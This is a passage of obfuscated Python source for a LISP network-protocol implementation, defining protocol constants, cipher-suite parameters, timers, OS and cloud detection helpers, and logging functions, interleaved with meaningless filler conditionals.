if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
lisp_gleaned_groups = { }
if 26 - 26: Ii1I % I1ii11iIi11i
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
if 19 - 19: I1IiiI
if 25 - 25: Ii1I / ooOoO0o
lisp_icmp_raw_socket = None
if ( os . getenv ( "LISP_SEND_ICMP_TOO_BIG" ) != None ) :
lisp_icmp_raw_socket = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_ICMP )
lisp_icmp_raw_socket . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if 71 - 71: I1Ii111 . II111iiii
lisp_ignore_df_bit = ( os . getenv ( "LISP_IGNORE_DF_BIT" ) != None )
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
LISP_SEND_PUBSUB_ACTION = 6
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
lisp_map_reply_action_string = [ "no-action" , "native-forward" ,
"send-map-request" , "drop-action" , "policy-denied" ,
"auth-failure" , "send-subscribe" ]
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
if 92 - 92: OoOoOO00 + I1Ii111 * Ii1I % I1IiiI
if 42 - 42: Oo0Ooo
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
LISP_MR_TTL = ( 24 * 60 )
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60
LISP_TEST_MR_INTERVAL = 60
LISP_MAP_NOTIFY_INTERVAL = 2
LISP_DDT_MAP_REQUEST_INTERVAL = 2
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15
LISP_MAP_REQUEST_RATE_LIMIT = .5
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10
LISP_RLOC_PROBE_REPLY_WAIT = 15
LISP_DEFAULT_DYN_EID_TIMEOUT = 15
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
if 48 - 48: O0
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
if 9 - 9: ooOoO0o * OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoO0O00
if 49 - 49: II111iiii
if 25 - 25: OoooooooOO - I1IiiI . I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if 42 - 42: I1Ii111 . I1IiiI . i1IIi + OoOoOO00 + OOooOOo + I1IiiI
if 31 - 31: iII111i . OOooOOo - ooOoO0o . OoooooooOO / OoooooooOO
if 56 - 56: OoO0O00 / oO0o / i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 54 - 54: i1IIi + II111iiii
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
if 5 - 5: Ii1I
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
if 46 - 46: IiII
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
if 45 - 45: ooOoO0o
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
if 21 - 21: oO0o . I1Ii111 . OOooOOo / Oo0Ooo / I1Ii111
use_chacha = ( os . getenv ( "LISP_USE_CHACHA" ) != None )
use_poly = ( os . getenv ( "LISP_USE_POLY" ) != None )
if 17 - 17: OOooOOo / OOooOOo / I11i
if 1 - 1: i1IIi . i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
def lisp_record_traceback ( * args ) :
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
i1 = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
OO0oOOoo = open ( "./logs/lisp-traceback.log" , "a" )
OO0oOOoo . write ( "---------- Exception occurred: {} ----------\n" . format ( i1 ) )
try :
traceback . print_last ( file = OO0oOOoo )
except :
OO0oOOoo . write ( "traceback.print_last(file=fd) failed" )
if 52 - 52: o0oOOo0O0Ooo % Oo0Ooo
try :
traceback . print_last ( )
except :
print ( "traceback.print_last() failed" )
if 64 - 64: O0 % I11i % O0 * OoO0O00 . oO0o + I1IiiI
OO0oOOoo . close ( )
return
if 75 - 75: I11i . OoooooooOO % o0oOOo0O0Ooo * I11i % OoooooooOO
if 13 - 13: IiII / i11iIiiIii % II111iiii % I11i . I1ii11iIi11i
if 8 - 8: OoOoOO00 + Oo0Ooo - II111iiii
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if 39 - 39: I1Ii111
if 86 - 86: I11i * I1IiiI + I11i + II111iiii
if 8 - 8: I1Ii111 - iII111i / ooOoO0o
def lisp_set_exception ( ) :
sys . excepthook = lisp_record_traceback
return
if 96 - 96: OoOoOO00
if 29 - 29: I1ii11iIi11i / i1IIi . I1IiiI - OoOoOO00 - OoOoOO00 - Ii1I
if 20 - 20: i1IIi % OoO0O00 . I1IiiI / IiII * i11iIiiIii * OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
if 74 - 74: O0 / i1IIi
def lisp_is_raspbian ( ) :
if ( distro . linux_distribution ( ) [ 0 ] != "debian" ) : return ( False )
return ( platform . machine ( ) in [ "armv6l" , "armv7l" ] )
if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
if 31 - 31: OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
def lisp_is_ubuntu ( ) :
return ( distro . linux_distribution ( ) [ 0 ] == "Ubuntu" )
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
def lisp_is_fedora ( ) :
return ( distro . linux_distribution ( ) [ 0 ] == "fedora" )
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
if 78 - 78: ooOoO0o * I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1 / I1Ii111 . Ii1I
def lisp_is_centos ( ) :
return ( distro . linux_distribution ( ) [ 0 ] == "centos" )
if 97 - 97: ooOoO0o / I1Ii111 % i1IIi % I1ii11iIi11i
if 18 - 18: iIii1I11I1II1 % I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
def lisp_is_debian ( ) :
return ( distro . linux_distribution ( ) [ 0 ] == "debian" )
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
def lisp_is_debian_kali ( ) :
return ( distro . linux_distribution ( ) [ 0 ] == "Kali" )
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
if 67 - 67: I1IiiI
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
if 98 - 98: OoO0O00 . OoO0O00 * oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
def lisp_is_macos ( ) :
return ( platform . uname ( ) [ 0 ] == "Darwin" )
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
def lisp_is_alpine ( ) :
return ( os . path . exists ( "/etc/alpine-release" ) )
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
def lisp_is_x86 ( ) :
i1i1IIii1i1 = platform . machine ( )
return ( i1i1IIii1i1 in ( "x86" , "i686" , "x86_64" ) )
if 65 - 65: I1IiiI + OoOoOO00 / OOooOOo
if 83 - 83: o0oOOo0O0Ooo . iII111i - Oo0Ooo
if 65 - 65: iIii1I11I1II1 / ooOoO0o . IiII - II111iiii
if 72 - 72: iIii1I11I1II1 / IiII % iII111i % OOooOOo - I11i % OOooOOo
if 100 - 100: Oo0Ooo + i11iIiiIii
if 71 - 71: I11i / o0oOOo0O0Ooo / I1Ii111 % OOooOOo
if 51 - 51: IiII * O0 / II111iiii . Ii1I % OOooOOo / I1IiiI
def lisp_is_linux ( ) :
return ( platform . uname ( ) [ 0 ] == "Linux" )
if 9 - 9: I1IiiI % I1IiiI % II111iiii
if 30 - 30: IiII + I1Ii111 - IiII . IiII - II111iiii + O0
if 86 - 86: i1IIi
if 41 - 41: OoOoOO00 * I11i / OoOoOO00 % oO0o
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
def lisp_is_python2 ( ) :
oOoOOo0oo0 = sys . version . split ( ) [ 0 ]
return ( oOoOOo0oo0 [ 0 : 3 ] == "2.7" )
if 60 - 60: ooOoO0o * I1Ii111 + Oo0Ooo
if 19 - 19: OoO0O00 * I11i / I11i . OoooooooOO - OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if 30 - 30: OoOoOO00
def lisp_is_python3 ( ) :
oOoOOo0oo0 = sys . version . split ( ) [ 0 ]
return ( oOoOOo0oo0 [ 0 : 2 ] == "3." )
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if 10 - 10: II111iiii . iII111i
if 32 - 32: Ii1I . IiII . OoooooooOO - OoO0O00 + oO0o
if 88 - 88: iII111i
if 19 - 19: II111iiii * IiII + Ii1I
if 65 - 65: OOooOOo . I1Ii111 . OoO0O00 . iII111i - OOooOOo
def lisp_on_aws ( ) :
ii111i = getoutput ( "sudo dmidecode -s bios-vendor" )
if ( ii111i . find ( "command not found" ) != - 1 and lisp_on_docker ( ) ) :
oooo00 = bold ( "AWS check" , False )
lprint ( "{} - dmidecode not installed in docker container" . format ( oooo00 ) )
if 77 - 77: ooOoO0o - I1IiiI % I11i - O0
return ( ii111i . lower ( ) . find ( "amazon" ) != - 1 )
if 67 - 67: OOooOOo + Oo0Ooo
if 84 - 84: O0 * OoooooooOO - IiII * IiII
if 8 - 8: ooOoO0o / i1IIi . oO0o
if 41 - 41: iII111i + OoO0O00
if 86 - 86: OoOoOO00 . iIii1I11I1II1 - OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
def lisp_on_gcp ( ) :
ii111i = getoutput ( "sudo dmidecode -s bios-version" )
return ( ii111i . lower ( ) . find ( "google" ) != - 1 )
if 23 - 23: oO0o - OOooOOo + I11i
if 12 - 12: I1IiiI / ooOoO0o % o0oOOo0O0Ooo / i11iIiiIii % OoooooooOO
if 15 - 15: iIii1I11I1II1 % OoooooooOO - Oo0Ooo * Ii1I + I11i
if 11 - 11: iII111i * Ii1I - OoOoOO00
if 66 - 66: OoOoOO00 . i11iIiiIii - iII111i * o0oOOo0O0Ooo + OoooooooOO * I1ii11iIi11i
if 74 - 74: Oo0Ooo
if 61 - 61: Oo0Ooo - I1Ii111 * II111iiii % ooOoO0o * iIii1I11I1II1 + OoO0O00
def lisp_on_docker ( ) :
return ( os . path . exists ( "/.dockerenv" ) )
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if 35 - 35: OOooOOo * o0oOOo0O0Ooo * I1IiiI % Oo0Ooo . OoOoOO00
if 58 - 58: I11i + II111iiii * iII111i * i11iIiiIii - iIii1I11I1II1
if 68 - 68: OoooooooOO % II111iiii
if 26 - 26: II111iiii % i11iIiiIii % iIii1I11I1II1 % I11i * I11i * I1ii11iIi11i
if 24 - 24: II111iiii % I1Ii111 - ooOoO0o + I1IiiI * I1ii11iIi11i
if 2 - 2: Ii1I - IiII
if 83 - 83: oO0o % o0oOOo0O0Ooo % Ii1I - II111iiii * OOooOOo / OoooooooOO
def lisp_process_logfile ( ) :
IIIiIi = "./logs/lisp-{}.log" . format ( lisp_log_id )
if ( os . path . exists ( IIIiIi ) ) : return
if 34 - 34: OoooooooOO . O0 / oO0o * OoOoOO00 - I1ii11iIi11i
sys . stdout . close ( )
sys . stdout = open ( IIIiIi , "a" )
if 36 - 36: i1IIi / O0 / OoO0O00 - O0 - i1IIi
lisp_print_banner ( bold ( "logfile rotation" , False ) )
return
if 22 - 22: i1IIi + Ii1I
if 54 - 54: ooOoO0o % OOooOOo . I1Ii111 + oO0o - OOooOOo * I1IiiI
if 92 - 92: o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % OoO0O00 % IiII . OoooooooOO
if 52 - 52: ooOoO0o / i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + o0oOOo0O0Ooo
if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
if 58 - 58: Oo0Ooo / oO0o
if 44 - 44: OOooOOo
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
def lisp_i_am ( name ) :
global lisp_log_id , lisp_i_am_itr , lisp_i_am_etr , lisp_i_am_rtr
global lisp_i_am_mr , lisp_i_am_ms , lisp_i_am_ddt , lisp_i_am_core
global lisp_hostname
if 79 - 79: Ii1I . OoO0O00
lisp_log_id = name
if ( name == "itr" ) : lisp_i_am_itr = True
if ( name == "etr" ) : lisp_i_am_etr = True
if ( name == "rtr" ) : lisp_i_am_rtr = True
if ( name == "mr" ) : lisp_i_am_mr = True
if ( name == "ms" ) : lisp_i_am_ms = True
if ( name == "ddt" ) : lisp_i_am_ddt = True
if ( name == "core" ) : lisp_i_am_core = True
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if 52 - 52: i1IIi
if 84 - 84: Ii1I / IiII
lisp_hostname = socket . gethostname ( )
OOOooo0OooOoO = lisp_hostname . find ( "." )
if ( OOOooo0OooOoO != - 1 ) : lisp_hostname = lisp_hostname [ 0 : OOOooo0OooOoO ]
return
if 91 - 91: oO0o + I1IiiI
if 59 - 59: I1IiiI + i11iIiiIii + i1IIi / I11i
if 44 - 44: I11i . OoOoOO00 * I1IiiI + OoooooooOO - iII111i - IiII
if 15 - 15: IiII / O0 . o0oOOo0O0Ooo . i11iIiiIii
if 59 - 59: I1Ii111 - o0oOOo0O0Ooo - ooOoO0o
if 48 - 48: i1IIi + I11i % OoOoOO00 / Oo0Ooo - o0oOOo0O0Ooo
if 67 - 67: oO0o % o0oOOo0O0Ooo . OoooooooOO + OOooOOo * I11i * OoOoOO00
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
def lprint ( * args ) :
ii1I11iIiIII1 = ( "force" in args )
if ( lisp_debug_logging == False and ii1I11iIiIII1 == False ) : return
if 52 - 52: o0oOOo0O0Ooo * IiII + OoOoOO00
lisp_process_logfile ( )
i1 = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
i1 = i1 [ : - 3 ]
print ( "{}: {}:" . format ( i1 , lisp_log_id ) , end = " " )
if 49 - 49: iIii1I11I1II1 - O0 . i1IIi - OoooooooOO
for Ii1 in args :
if ( Ii1 == "force" ) : continue
print ( Ii1 , end = " " )
if 73 - 73: i1IIi + iII111i . i11iIiiIii
print ( )
if 5 - 5: oO0o . I1ii11iIi11i . II111iiii . OoooooooOO
try : sys . stdout . flush ( )
except : pass
return
if 96 - 96: i11iIiiIii - OOooOOo % O0 / OoO0O00
if 100 - 100: iII111i / Ii1I - OoooooooOO % II111iiii - I1IiiI % OoOoOO00
if 60 - 60: iIii1I11I1II1 + i1IIi
if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
if 51 - 51: OoOoOO00
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if 53 - 53: Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
def fprint ( * args ) :
i1IiiI1iIi = args + ( "force" , )
lprint ( * i1IiiI1iIi )
return
if 66 - 66: OoO0O00 * Oo0Ooo
if 28 - 28: OoO0O00 % OoOoOO00 % I1ii11iIi11i + I1IiiI / I1IiiI
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
def dprint ( * args ) :
if ( lisp_data_plane_logging ) : lprint ( * args )
return
if 1 - 1: ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
if 46 - 46: i11iIiiIii - O0 . oO0o
def cprint ( instance ) :
print ( "{}:" . format ( instance ) )
pprint . pprint ( instance . __dict__ )
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
if 83 - 83: I1Ii111
if 48 - 48: II111iiii * OOooOOo * I1Ii111
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
